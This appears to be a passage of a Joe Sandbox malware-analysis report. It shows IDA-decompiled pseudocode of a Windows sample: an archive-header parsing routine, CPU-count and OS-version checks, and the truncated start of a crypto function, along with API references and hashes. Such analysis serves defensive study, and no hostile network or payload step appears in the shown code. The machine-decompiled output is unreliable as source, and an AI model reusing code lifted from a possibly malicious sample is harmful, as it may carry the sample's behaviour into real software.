				_t367 = 0;
				 *((intOrPtr*)(_t454 - 0x38)) = 0;
				 *((intOrPtr*)(_t454 - 0x34)) = 0;
				 *((intOrPtr*)(_t454 - 0x30)) = 0;
				 *(_t454 - 4) = 0;
				if( *(_t454 - 0x20) != 3) {
					L8:
					 *(_t454 - 0x70) = _t367;
					 *(_t454 - 0x6c) = _t367;
					 *(_t454 - 0x68) = _t367;
					 *(_t454 - 0xa8) = _t367;
					 *(_t454 - 0xa4) = _t367;
					 *(_t454 - 0xa0) = _t367;
					 *(_t454 - 4) = 2;
					E0040E83C(_t454 - 0x9c);
					__eflags =  *(_t454 - 0x20) - 4;
					 *(_t454 - 4) = 3;
					if( *(_t454 - 0x20) == 4) {
						__eflags =  *(_t454 - 0x1c) - _t367;
						if(__eflags == 0) {
							_t378 = _t448 + 0x110;
							E0040FC2A(_t378, _t451, _t439, _t448, _t451, __eflags, _t454 - 0x38, _t378, _t448, _t454 - 0x70, _t454 - 0xa8);
							 *_t378 =  *_t378 +  *((intOrPtr*)(_t448 + 0x108));
							asm("adc [ebx+0x4], ecx");
							 *(_t454 - 0x20) = E0040EA46( *((intOrPtr*)(_t451 + 0x38)));
							 *(_t454 - 0x1c) = _t439;
							_t367 = 0;
							__eflags = 0;
						}
					}
					__eflags =  *(_t454 - 0x20) - 5;
					if(__eflags != 0) {
						L91:
						E00410785(_t448, __eflags);
						_t293 =  *(_t454 - 0x20) |  *(_t454 - 0x1c);
						__eflags =  *(_t454 - 0x20) |  *(_t454 - 0x1c);
						if(( *(_t454 - 0x20) |  *(_t454 - 0x1c)) != 0) {
							L93:
							 *((char*)(_t448 + 0x14d)) = 1;
							L94:
							E00403204(E00403204(E00403204(_t293,  *((intOrPtr*)(_t454 - 0x9c))),  *(_t454 - 0xa8)),  *(_t454 - 0x70));
							 *(_t454 - 4) =  *(_t454 - 4) | 0xffffffff;
							E00410DA8(_t367, _t454 - 0x38);
							_t298 = 0;
							__eflags = 0;
							L95:
							 *[fs:0x0] =  *((intOrPtr*)(_t454 - 0xc));
							return _t298;
						}
						_t453 =  *((intOrPtr*)(_t451 + 0x38));
						_t293 =  *((intOrPtr*)(_t453 + 4)) ==  *((intOrPtr*)(_t453 + 8));
						__eflags =  *((intOrPtr*)(_t453 + 4)) ==  *((intOrPtr*)(_t453 + 8));
						if( *((intOrPtr*)(_t453 + 4)) ==  *((intOrPtr*)(_t453 + 8))) {
							goto L94;
						}
						goto L93;
					} else {
						__eflags =  *(_t454 - 0x1c) - _t367;
						if(__eflags != 0) {
							goto L91;
						}
						_t300 = E0040EB3D( *((intOrPtr*)(_t451 + 0x38)), _t439, __eflags);
						_t369 = _t448 + 0x120;
						 *(_t454 + 8) = _t300;
						E00408F50(_t448 + 0x120, 9, 0);
						E00408F50(_t448 + 0x120, 6, 0);
						__eflags =  *(_t454 + 8);
						if( *(_t454 + 8) <= 0) {
							L16:
							_t303 = 0;
							__eflags = 0;
							L17:
							 *(_t454 - 0x50) = _t303;
							 *(_t454 - 0x4c) = _t303;
							 *(_t454 - 0x48) = _t303;
							 *(_t454 - 0x5c) = _t303;
							 *(_t454 - 0x58) = _t303;
							 *(_t454 - 0x54) = _t303;
							 *(_t454 - 0x44) = _t303;
							 *(_t454 - 0x40) = _t303;
							 *(_t454 - 0x3c) = _t303;
							 *(_t454 - 4) = 6;
							 *(_t454 - 0x18) = _t303;
							while(1) {
								_t304 = E0040EA46( *((intOrPtr*)(_t451 + 0x38)));
								_t390 =  *((intOrPtr*)(_t451 + 0x38));
								_t370 = _t304;
								__eflags = _t304 | _t439;
								 *(_t454 - 0x64) = _t370;
								 *(_t454 - 0x60) = _t439;
								if((_t304 | _t439) == 0) {
									break;
								}
								 *((intOrPtr*)(_t454 - 0x2c)) = E0040EA46(_t390);
								 *(_t454 - 0x28) = _t439;
								_t322 =  *((intOrPtr*)( *((intOrPtr*)(_t451 + 0x38)) + 4)) -  *((intOrPtr*)( *((intOrPtr*)(_t451 + 0x38)) + 8));
								__eflags = _t439;
								if(__eflags < 0) {
									L23:
									 *(_t454 - 0x8c) =  *(_t454 - 0x8c) & 0x00000000;
									 *(_t454 - 0x8b) =  *(_t454 - 0x8b) & 0x00000000;
									_push(1);
									 *(_t454 - 4) = 7;
									E0040E8D2(_t454 - 0x90, _t451,  *((intOrPtr*)( *((intOrPtr*)(_t451 + 0x38)) + 8)) +  *((intOrPtr*)( *((intOrPtr*)(_t451 + 0x38)))),  *((intOrPtr*)(_t454 - 0x2c)));
									__eflags =  *(_t454 - 0x60);
									if(__eflags > 0) {
										L59:
										 *((char*)(_t448 + 0x14d)) = 1;
										 *((intOrPtr*)( *((intOrPtr*)(_t451 + 0x38)) + 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t451 + 0x38)) + 4));
										L60:
										_t326 =  *((intOrPtr*)(_t451 + 0x38));
										_t414 =  *((intOrPtr*)(_t326 + 4)) !=  *((intOrPtr*)(_t326 + 8));
										__eflags =  *((intOrPtr*)(_t326 + 4)) !=  *((intOrPtr*)(_t326 + 8));
										if( *((intOrPtr*)(_t326 + 4)) !=  *((intOrPtr*)(_t326 + 8))) {
											E0040E966(_t414);
										}
										 *(_t454 - 4) = 6;
										E0040E883(_t454 - 0x90);
										continue;
									}
									if(__eflags < 0) {
										L26:
										_t87 = _t370 - 0xe; // -14
										_t329 = _t87;
										__eflags = _t329 - 0xb;
										if(__eflags > 0) {
											goto L59;
										}
										switch( *((intOrPtr*)(_t329 * 4 +  &M00410755))) {
											case 0:
												__eax = __ebp - 0x50;
												__ecx = __esi;
												__eax = E0040FD4C(__esi, __edx,  *((intOrPtr*)(__ebp + 8)), __ebp - 0x50);
												__ecx = __ebp - 0x50;
												__eax = E0040E867(__ecx);
												 *(__ebp - 0x58) =  *(__ebp - 0x58) & 0x00000000;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *((intOrPtr*)(__ebp - 0x18)) = __eax;
												goto L40;
											case 1:
												__eax = __ebp - 0x5c;
												goto L44;
											case 2:
												__eax = __ebp - 0x44;
												L44:
												__ecx = __esi;
												__eax = E0040FD4C(__ecx, __edx,  *((intOrPtr*)(__ebp - 0x18)), __eax);
												goto L40;
											case 3:
												 *(_t454 - 0x7c) =  *(_t454 - 0x7c) & 0x00000000;
												 *(_t454 - 0x7b) =  *(_t454 - 0x7b) & 0x00000000;
												 *(_t454 - 4) = 8;
												E0040E913(_t454 - 0x80, __eflags, _t451, _t454 - 0x38);
												_t377 =  *((intOrPtr*)( *((intOrPtr*)(_t451 + 0x38)) + 4)) -  *((intOrPtr*)( *((intOrPtr*)(_t451 + 0x38)) + 8));
												E00407AB8(_t448 + 0xe8, _t377);
												E0040E9D2( *((intOrPtr*)(_t451 + 0x38)),  *((intOrPtr*)(_t448 + 0xe8)), _t377);
												E00410D2E(_t448 + 0xf0,  *(_t454 + 8) + 1);
												__eflags =  *(_t454 + 8);
												 *(_t454 - 0x14) = 0;
												 *(_t454 - 0x24) = 0;
												if( *(_t454 + 8) <= 0) {
													L35:
													_t439 =  *(_t454 - 0x24);
													__eflags =  *(_t454 - 0x14) - _t377;
													 *( *((intOrPtr*)(_t448 + 0xf0)) + _t439 * 4) =  *(_t454 - 0x14) >> 1;
													if( *(_t454 - 0x14) != _t377) {
														 *((char*)(_t451 + 0x3c)) = 1;
													}
													 *(_t454 - 4) = 7;
													_t422 = _t454 - 0x80;
													goto L39;
												} else {
													goto L29;
												}
												do {
													L29:
													_t443 =  *(_t454 - 0x14);
													 *(_t454 - 0x10) = 0;
													_t425 =  *((intOrPtr*)(_t448 + 0xe8)) + _t443;
													_t345 = _t377 - _t443 >> 1;
													__eflags = _t345;
													if(_t345 == 0) {
														goto L32;
													} else {
														goto L30;
													}
													while(1) {
														L30:
														__eflags =  *_t425;
														if( *_t425 == 0) {
															goto L32;
														}
														 *(_t454 - 0x10) =  *(_t454 - 0x10) + 1;
														_t425 = _t425 + 2;
														__eflags =  *(_t454 - 0x10) - _t345;
														if( *(_t454 - 0x10) < _t345) {
															continue;
														}
														goto L32;
													}
													L32:
													__eflags =  *(_t454 - 0x10) - _t345;
													if( *(_t454 - 0x10) == _t345) {
														E0040E966(_t425);
													}
													_t426 =  *(_t454 - 0x24);
													 *( *((intOrPtr*)(_t448 + 0xf0)) + _t426 * 4) =  *(_t454 - 0x14) >> 1;
													_t427 = _t426 + 1;
													__eflags = _t427 -  *(_t454 + 8);
													 *(_t454 - 0x24) = _t427;
													 *(_t454 - 0x14) =  *(_t454 - 0x14) + 2 +  *(_t454 - 0x10) * 2;
												} while (_t427 <  *(_t454 + 8));
												goto L35;
											case 4:
												_push( *((intOrPtr*)(__ebp + 8)));
												__eax = __edi + 0x64;
												goto L49;
											case 5:
												_push( *((intOrPtr*)(__ebp + 8)));
												__eax = __edi + 0x7c;
												goto L49;
											case 6:
												_push( *((intOrPtr*)(__ebp + 8)));
												__eax = __edi + 0x94;
												goto L49;
											case 7:
												__ebx = __edi + 0xc4;
												__ecx = __esi;
												__eax = E0040FD9A(__esi, __edx, __eflags,  *((intOrPtr*)(__ebp + 8)), __ebx);
												 *(__ebp - 0x74) =  *(__ebp - 0x74) & 0x00000000;
												_t142 = __ebp - 0x73;
												 *_t142 =  *(__ebp - 0x73) & 0x00000000;
												__eflags =  *_t142;
												__eax = __ebp - 0x38;
												__ecx = __ebp - 0x78;
												 *((char*)(__ebp - 4)) = 9;
												__eax = E0040E913(__ebp - 0x78, __eflags, __esi, __ebp - 0x38);
												__ecx = __esi;
												__eax = E0040F19A(__esi, __eflags, __ebx);
												 *((char*)(__ebp - 4)) = 7;
												__ecx = __ebp - 0x78;
												L39:
												E0040E883(_t422);
												goto L40;
											case 8:
												goto L59;
											case 9:
												_push( *((intOrPtr*)(__ebp + 8)));
												__eax = __edi + 0xac;
												L49:
												_push(__eax);
												__eax = __ebp - 0x38;
												_push(__ebp - 0x38);
												__ecx = __esi;
												__eax = E0040FDF2(__ecx, __edx, __eflags);
												L40:
												E00408F50(_t448 + 0x120,  *(_t454 - 0x64),  *(_t454 - 0x60));
												goto L60;
											case 0xa:
												__ebx = 0;
												__eflags =  *(__ebp - 0x28);
												 *((intOrPtr*)(__ebp - 0x88)) = 0;
												if(__eflags < 0) {
													goto L60;
												}
												if(__eflags > 0) {
													goto L53;
													do {
														do {
															L53:
															__ecx =  *((intOrPtr*)(__esi + 0x38));
															__eax = E0040E9B4(__ecx);
															__eflags = __al;
															if(__al != 0) {
																 *((char*)(__esi + 0x3c)) = 1;
															}
															 *((intOrPtr*)(__ebp - 0x88)) =  *((intOrPtr*)(__ebp - 0x88)) + 1;
															asm("adc ebx, 0x0");
															__eflags = __ebx -  *(__ebp - 0x28);
														} while (__eflags < 0);
														if(__eflags > 0) {
															goto L60;
														}
														__eax =  *((intOrPtr*)(__ebp - 0x88));
														__eflags =  *((intOrPtr*)(__ebp - 0x88)) -  *(__ebp - 0x2c);
													} while ( *((intOrPtr*)(__ebp - 0x88)) <  *(__ebp - 0x2c));
													goto L60;
												}
												__eflags =  *(__ebp - 0x2c);
												if( *(__ebp - 0x2c) <= 0) {
													goto L60;
												}
												goto L53;
										}
									}
									__eflags = _t370 - 0x40000000;
									if(_t370 > 0x40000000) {
										goto L59;
									}
									goto L26;
								}
								if(__eflags > 0) {
									L22:
									E0040E966(0);
									goto L23;
								}
								__eflags =  *((intOrPtr*)(_t454 - 0x2c)) - _t322;
								if( *((intOrPtr*)(_t454 - 0x2c)) <= _t322) {
									goto L23;
								}
								goto L22;
							}
							 *(_t454 - 0x20) = E0040EA46(_t390);
							 *(_t454 - 0x1c) = _t439;
							__eflags =  *(_t454 + 8) -  *(_t454 - 0x18) -  *(_t454 - 0x6c);
							if( *(_t454 + 8) -  *(_t454 - 0x18) !=  *(_t454 - 0x6c)) {
								_push(0x41de18);
								_push(_t454 + 0xb);
								L00418E02();
							}
							 *(_t454 - 0x10) =  *(_t454 - 0x10) & 0x00000000;
							 *(_t454 - 0x18) =  *(_t454 - 0x18) & 0x00000000;
							_t309 = E0040E867(_t454 - 0x44);
							__eflags = _t309;
							 *(_t454 - 0x28) = _t309;
							if(_t309 != 0) {
								_t375 = _t448 + 0xdc;
								E00408B28(_t375,  *(_t454 + 8));
								 *(_t375 + 4) =  *(_t454 + 8);
							}
							_t371 = _t448 + 0x58;
							E00410E34(_t371,  *(_t454 + 8));
							_t311 =  *(_t454 + 8);
							 *(_t371 + 4) = _t311;
							_t367 = 0;
							__eflags = _t311;
							 *(_t454 - 0x14) = 0;
							if(__eflags <= 0) {
								L90:
								_t313 = E00403204(E00403204(_t311,  *(_t454 - 0x44)),  *(_t454 - 0x5c));
								 *(_t454 - 4) = 3;
								E00403204(_t313,  *(_t454 - 0x50));
								_t457 = _t457 + 0xc;
								goto L91;
							} else {
								_t214 = _t454 - 0x24;
								 *_t214 =  *(_t454 - 0x24) & 0;
								__eflags =  *_t214;
								do {
									_t440 =  *(_t454 - 0x10);
									_t311 =  *((intOrPtr*)(_t448 + 0x58)) +  *(_t454 - 0x24);
									_t311[2] = _t311[2] & 0x00000000;
									__eflags = _t367 -  *(_t454 - 0x4c);
									if(_t367 >=  *(_t454 - 0x4c)) {
										_t393 = 0;
										__eflags = 0;
									} else {
										_t393 =  *((intOrPtr*)(_t367 +  *(_t454 - 0x50)));
									}
									__eflags = _t393;
									if(_t393 != 0) {
										_t311[3] = _t311[3] & 0x00000000;
										__eflags = _t440 -  *(_t454 - 0x58);
										if(_t440 >=  *(_t454 - 0x58)) {
											_t394 = 0;
											__eflags = 0;
										} else {
											_t394 =  *((intOrPtr*)(_t440 +  *(_t454 - 0x5c)));
										}
										__eflags = _t394;
										_t311[3] = _t394 & 0xffffff00 | _t394 == 0x00000000;
										__eflags = _t440 -  *(_t454 - 0x40);
										if(_t440 >=  *(_t454 - 0x40)) {
											_t441 = 0;
											__eflags = 0;
										} else {
											_t441 =  *((intOrPtr*)( *(_t454 - 0x10) +  *(_t454 - 0x44)));
										}
										 *_t311 =  *_t311 & 0x00000000;
										 *(_t454 - 0x10) =  *(_t454 - 0x10) + 1;
										_t311[1] = _t311[1] & 0x00000000;
										_t261 =  &(_t311[3]);
										 *_t261 = _t311[3] & 0x00000000;
										__eflags =  *_t261;
									} else {
										_t311[3] = _t311[3] & _t393;
										_t311[3] = 1;
										_t441 = 0;
										_t400 =  *(_t454 - 0x70) +  *(_t454 - 0x18) * 8;
										 *_t311 =  *_t400;
										_t374 =  *(_t454 - 0x18);
										_t311[1] = _t400[1];
										__eflags = _t374 -  *(_t454 - 0xa4);
										if(_t374 >=  *(_t454 - 0xa4)) {
											L76:
											__eflags = 0;
											L77:
											__eflags = 0;
											_t311[3] = 0;
											if(0 != 0) {
												_t311[2] =  *( *((intOrPtr*)(_t454 - 0x9c)) + _t374 * 4);
											}
											 *(_t454 - 0x18) =  *(_t454 - 0x18) + 1;
											_t367 =  *(_t454 - 0x14);
											goto L87;
										}
										_t405 =  *(_t454 - 0xa8);
										__eflags =  *(_t374 + _t405);
										if( *(_t374 + _t405) == 0) {
											goto L76;
										}
										_push(1);
										_pop(0);
										goto L77;
									}
									L87:
									__eflags =  *(_t454 - 0x28);
									if( *(_t454 - 0x28) != 0) {
										_t311 =  *(_t448 + 0xdc);
										 *((char*)( *(_t448 + 0xdc) + _t367)) = _t441;
									}
									 *(_t454 - 0x24) =  *(_t454 - 0x24) + 0x10;
									_t367 = _t367 + 1;
									__eflags = _t367 -  *(_t454 + 8);
									 *(_t454 - 0x14) = _t367;
								} while (__eflags < 0);
								goto L90;
							}
						}
						_t303 = 0;
						__eflags =  *(_t454 - 0xa4);
						if( *(_t454 - 0xa4) == 0) {
							goto L17;
						}
						E00408F50(_t369, 0xa, 0);
						goto L16;
					}
				}
				_t464 =  *(_t454 - 0x1c);
				if( *(_t454 - 0x1c) != 0) {
					goto L8;
				}
				_t379 = _t448 + 0x118;
				_push(_t454 - 0x38);
				_push(_t379);
				_push( *((intOrPtr*)(_t448 + 0x10c)));
				_push( *((intOrPtr*)(_t448 + 0x108)));
				_t359 = E0040FE8A(_t451, _t439, _t464);
				 *(_t454 + 8) = _t359;
				if(_t359 == 0) {
					 *_t379 =  *_t379 +  *((intOrPtr*)(_t448 + 0x108));
					asm("adc [ebx+0x4], ecx");
					 *(_t454 - 0x20) = E0040EA46( *((intOrPtr*)(_t451 + 0x38)));
					 *(_t454 - 0x1c) = _t439;
					_t367 = 0;
					__eflags = 0;
					goto L8;
				}
				 *(_t454 - 4) =  *(_t454 - 4) | 0xffffffff;
				E00410DA8(_t379, _t454 - 0x38);
				_t298 =  *(_t454 + 8);
				goto L95;
			}

0x00410138
0x0041013d
0x00410142
0x0041014a
0x00410150
0x00410155
0x0041015b
0x0041015e
0x00410161
0x00410163
0x00410165
0x00410170
0x0041017d
0x00410180
0x00410180
0x00410165
0x00410183
0x00410185
0x00410188
0x0041018b
0x00410192
0x00410195
0x004101f6
0x004101f6
0x004101f9
0x004101fc
0x004101ff
0x00410205
0x0041020b
0x00410217
0x0041021b
0x00410220
0x00410224
0x00410228
0x0041022a
0x0041022d
0x00410235
0x00410248
0x00410259
0x0041025b
0x00410266
0x00410269
0x0041026c
0x0041026c
0x0041026c
0x0041022d
0x0041026e
0x00410272
0x004106f4
0x004106f6
0x004106fe
0x004106fe
0x00410701
0x0041070e
0x0041070e
0x00410715
0x0041072e
0x00410733
0x0041073d
0x00410742
0x00410742
0x00410744
0x0041074a
0x00410752
0x00410752
0x00410703
0x00410709
0x00410709
0x0041070c
0x00000000
0x00000000
0x00000000
0x00410278
0x00410278
0x0041027b
0x00000000
0x00000000
0x00410284
0x00410289
0x00410295
0x00410298
0x004102a3
0x004102a8
0x004102ac
0x004102c2
0x004102c2
0x004102c2
0x004102c4
0x004102c4
0x004102c7
0x004102ca
0x004102cd
0x004102d0
0x004102d3
0x004102d6
0x004102d9
0x004102dc
0x004102df
0x004102e3
0x004102e6
0x004102e9
0x004102ee
0x004102f1
0x004102f3
0x004102f5
0x004102f8
0x004102fb
0x00000000
0x00000000
0x00410309
0x0041030c
0x00410312
0x00410317
0x00410319
0x00410327
0x00410327
0x0041032e
0x00410338
0x0041033d
0x0041034e
0x00410353
0x00410357
0x00410558
0x00410558
0x00410565
0x00410568
0x00410568
0x0041056e
0x0041056e
0x00410571
0x00410573
0x00410573
0x0041057e
0x00410582
0x00000000
0x00410582
0x0041035d
0x0041036b
0x0041036b
0x0041036b
0x0041036e
0x00410371
0x00000000
0x00000000
0x00410377
0x00000000
0x004104ac
0x004104af
0x004104b5
0x004104ba
0x004104bd
0x004104c2
0x004104c6
0x004104ca
0x00000000
0x00000000
0x004104cf
0x00000000
0x00000000
0x004104d4
0x004104d7
0x004104d8
0x004104dd
0x00000000
0x00000000
0x0041037e
0x00410382
0x0041038e
0x00410392
0x004103a3
0x004103a7
0x004103b7
0x004103c7
0x004103ce
0x004103d1
0x004103d4
0x004103d7
0x00410435
0x0041043e
0x00410443
0x00410446
0x00410449
0x0041044b
0x0041044b
0x0041044f
0x00410453
0x00000000
0x00000000
0x00000000
0x00000000
0x004103d9
0x004103d9
0x004103d9
0x004103e4
0x004103ed
0x004103f0
0x004103f0
0x004103f2
0x00000000
0x00000000
0x00000000
0x00000000
0x004103f4
0x004103f4
0x004103f4
0x004103f8
0x00000000
0x00000000
0x004103fa
0x004103fe
0x004103ff
0x00410402
0x00000000
0x00000000
0x00000000
0x00410402
0x00410404
0x00410404
0x00410407
0x00410409
0x00410409
0x00410417
0x0041041c
0x00410425
0x00410426
0x00410429
0x00410430
0x00410430
0x00000000
0x00000000
0x004104ef
0x004104f2
0x00000000
0x00000000
0x004104f7
0x004104fa
0x00000000
0x00000000
0x004104ff
0x00410502
0x00000000
0x00000000
0x00410458
0x0041045e
0x00410464
0x00410469
0x0041046d
0x0041046d
0x0041046d
0x00410471
0x00410474
0x00410479
0x0041047d
0x00410483
0x00410485
0x0041048a
0x0041048e
0x00410491
0x00410491
0x00000000
0x00000000
0x00000000
0x00000000
0x004104e4
0x004104e7
0x00410508
0x00410508
0x00410509
0x0041050c
0x0041050d
0x0041050f
0x00410496
0x004104a2
0x00000000
0x00000000
0x00410516
0x00410518
0x0041051b
0x00410521
0x00000000
0x00000000
0x00410523
0x00000000
0x0041052a
0x0041052a
0x0041052a
0x0041052a
0x0041052d
0x00410532
0x00410534
0x00410536
0x00410536
0x0041053a
0x00410541
0x00410544
0x00410544
0x00410549
0x00000000
0x00000000
0x0041054b
0x00410551
0x00410551
0x00000000
0x00410556
0x00410525
0x00410528
0x00000000
0x00000000
0x00000000
0x00000000
0x00410377
0x0041035f
0x00410365
0x00000000
0x00000000
0x00000000
0x00410365
0x0041031b
0x00410322
0x00410322
0x00000000
0x00410322
0x0041031d
0x00410320
0x00000000
0x00000000
0x00000000
0x00410320
0x00410591
0x0041059a
0x0041059d
0x004105a0
0x004105a5
0x004105b0
0x004105b1
0x004105b1
0x004105b6
0x004105ba
0x004105c1
0x004105c6
0x004105c8
0x004105cb
0x004105d0
0x004105d8
0x004105e0
0x004105e0
0x004105e6
0x004105eb
0x004105f0
0x004105f3
0x004105f6
0x004105f8
0x004105fa
0x004105fd
0x004106d5
0x004106e0
0x004106e8
0x004106ec
0x004106f1
0x00000000
0x00410603
0x00410603
0x00410603
0x00410603
0x00410606
0x00410609
0x0041060c
0x0041060f
0x00410613
0x00410616
0x00410620
0x00410620
0x00410618
0x0041061b
0x0041061b
0x00410622
0x00410624
0x0041067a
0x0041067e
0x00410681
0x0041068b
0x0041068b
0x00410683
0x00410686
0x00410686
0x0041068d
0x00410692
0x00410695
0x00410698
0x004106a5
0x004106a5
0x0041069a
0x004106a0
0x004106a0
0x004106a7
0x004106aa
0x004106ad
0x004106b1
0x004106b1
0x004106b1
0x00410626
0x00410626
0x0041062c
0x00410633
0x00410635
0x0041063a
0x0041063c
0x00410642
0x00410645
0x0041064b
0x0041065d
0x0041065d
0x0041065f
0x0041065f
0x00410661
0x00410664
0x0041066f
0x0041066f
0x00410672
0x00410675
0x00000000
0x00410675
0x0041064d
0x00410653
0x00410656
0x00000000
0x00000000
0x00410658
0x0041065a
0x00000000
0x0041065a
0x004106b5
0x004106b5
0x004106b9
0x004106bb
0x004106c1
0x004106c1
0x004106c4
0x004106c8
0x004106c9
0x004106cc
0x004106cc
0x00000000
0x00410606
0x004105fd
0x004102ae
0x004102b0
0x004102b6
0x00000000
0x00000000
0x004102bd
0x00000000
0x004102bd
0x00410272
0x00410197
0x0041019a
0x00000000
0x00000000
0x0041019f
0x004101a5
0x004101a6
0x004101a7
0x004101af
0x004101b5
0x004101bc
0x004101bf
0x004101e1
0x004101e3
0x004101ee
0x004101f1
0x004101f4
0x004101f4
0x00000000
0x004101f4
0x004101c1
0x004101c8
0x004101cd
0x00000000

APIs

__EH_prolog.LIBCMT ref: 0041013D

Part of subcall function 0040E966: _CxxThrowException.MSVCRT(?,0041DDD8), ref: 0040E979

Part of subcall function 0040E9D2: memcpy.MSVCRT ref: 0040E9F8

_CxxThrowException.MSVCRT(?,0041DE18), ref: 004105B1

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: ExceptionThrow$H_prologmemcpy
String ID:
API String ID: 3273695820-0
Opcode ID: 8608d0076eec31eca5f0e81755e1f876d4cdaf6c97ca9a4aa084ed0ad63cd1ce
Instruction ID: 1e1c7e61ba698c275f7f534d06f4bc4e9de0f72c169ee7f0706794f77a0469e0
Opcode Fuzzy Hash: 8608d0076eec31eca5f0e81755e1f876d4cdaf6c97ca9a4aa084ed0ad63cd1ce
Instruction Fuzzy Hash: E0225B70900209EFCB14DFA5C580BEEBBB1BF49304F14806EE449A7292DB78AAD5CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00405FE9, Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405FE9() {
				char _v12;
				struct _SYSTEM_INFO _v48;

				if(E00405FD6( &_v12) == 0) {
					L3:
					GetSystemInfo( &_v48);
					return _v48.dwNumberOfProcessors;
				} else {
					_t10 = _v12;
					if(_v12 == 0) {
						goto L3;
					} else {
						return E00405FBE(_t10);
					}
				}
			}

0x00405ff9
0x00406009
0x0040600d
0x00406017
0x00405ffb
0x00405ffb
0x00406000
0x00000000
0x00406002
0x00406008
0x00406008
0x00406000

APIs

Part of subcall function 00405FD6: GetCurrentProcess.KERNEL32(?,?,00405FF7), ref: 00405FDB
Part of subcall function 00405FD6: GetProcessAffinityMask.KERNEL32(00000000), ref: 00405FE2

GetSystemInfo.KERNEL32(?), ref: 0040600D

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: Process$AffinityCurrentInfoMaskSystem
String ID:
API String ID: 3251479945-0
Opcode ID: 9638cc95e3299b83821e6c84bee8aa3ccb8c6e68d8bff0197413b8266dbdf947
Instruction ID: a595d45d0e218688a76e62c7e93015bc085ee55c95d1e1a04d1298ad9275ef66
Opcode Fuzzy Hash: 9638cc95e3299b83821e6c84bee8aa3ccb8c6e68d8bff0197413b8266dbdf947
Instruction Fuzzy Hash: F0D01230A0120A97DF04EBE6D4469EFB7789E4424CF04407ED902F21D1EB78D5448B65

Uniqueness

Uniqueness Score: -1.00%

Function 00401951, Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401951() {
				struct _OSVERSIONINFOW _v280;
				void* _t7;

				_v280.dwOSVersionInfoSize = 0x114;
				if(GetVersionExW( &_v280) == 0 || _v280.dwPlatformId != 2) {
					return 0;
				} else {
					_t7 = 1;
					return _t7;
				}
			}

0x00401960
0x00401973
0x00401986
0x0040197e
0x00401980
0x00401982
0x00401982

APIs

GetVersionExW.KERNEL32(?), ref: 0040196B

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 3796a73e287461f867f45a08f1f6e5757d9a1514d5947a266d71f92e6a93000a
Instruction ID: 5ea60d680a3723cf7479c9b9c674eb7bbe69d84cac2f3f11a719c8fc44cf451d
Opcode Fuzzy Hash: 3796a73e287461f867f45a08f1f6e5757d9a1514d5947a266d71f92e6a93000a
Instruction Fuzzy Hash: F7D05EB0A0020C47DF349B20ED1B7CBB6E8A700F48F0041F19A05F22C0E6B8DA89CDA5

Uniqueness

Uniqueness Score: -1.00%

Function 00417EC0, Relevance: .7, Instructions: 744
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00417EC0(signed int __ecx) {
				signed int _v4;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v68;
				signed int _v72;
				signed int _v76;
				void* _v80;
				intOrPtr _v84;
				void* _v88;
				void* _v92;
				char _v96;
				signed int _v100;
				void* _v104;
				signed int _v108;
				void* _v112;
				void* _v116;
				void* _v120;
				void* _v124;
				void* _v128;
				void* _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				void* _v176;
				void* _v180;
				signed int _v184;
				signed int _t368;
				void* _t370;
				signed int _t372;
				signed int _t377;
				signed int _t378;
				void* _t380;
				signed int _t382;
				signed int _t384;
				void* _t389;
				signed int _t393;
				signed int _t395;
				signed int _t398;
				signed int _t404;
				signed int _t408;
				signed int _t409;
				signed int _t412;
				signed int _t413;
				signed int _t415;
				signed int _t420;
				signed int _t422;
				void* _t432;
				void* _t433;
				intOrPtr* _t441;
				signed int* _t443;
				intOrPtr* _t445;
				intOrPtr _t448;
				signed int _t459;
				intOrPtr _t465;
				signed int _t471;
				void* _t478;
				signed int _t484;
				signed int _t488;
				signed int _t495;
				void* _t496;
				signed int _t498;
				signed int _t507;
				signed int _t508;
				signed int _t513;
				unsigned int _t516;
				signed int _t517;
				void* _t522;
				signed int _t525;
				signed int** _t532;
				signed int _t534;
				signed int _t535;
				void* _t543;
				void* _t544;
				intOrPtr _t554;
				char _t555;
